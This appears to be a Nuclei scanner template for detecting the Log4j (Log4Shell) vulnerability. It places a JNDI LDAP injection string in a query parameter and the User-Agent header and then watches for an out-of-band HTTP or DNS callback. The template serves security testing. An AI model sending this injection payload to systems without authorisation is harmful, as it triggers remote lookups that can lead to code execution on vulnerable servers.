id: log4j-detect

info:
  name: Log4j Detect for Logs
  author: numanturle
  severity: info

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?test=${jndi:ldap://{{interactsh-url}}/a}"

    headers:
      Host: "{{Host}}"
      User-Agent: "Mozilla ${jndi:ldap://{{interactsh-url}}/a}"

    matchers-condition: or
    matchers:
      - type: word
        part: interactsh_protocol
        name: http
        words:
          - "http"

      - type: word
        part: interactsh_protocol
        name: dns
        words:
          - "dns"
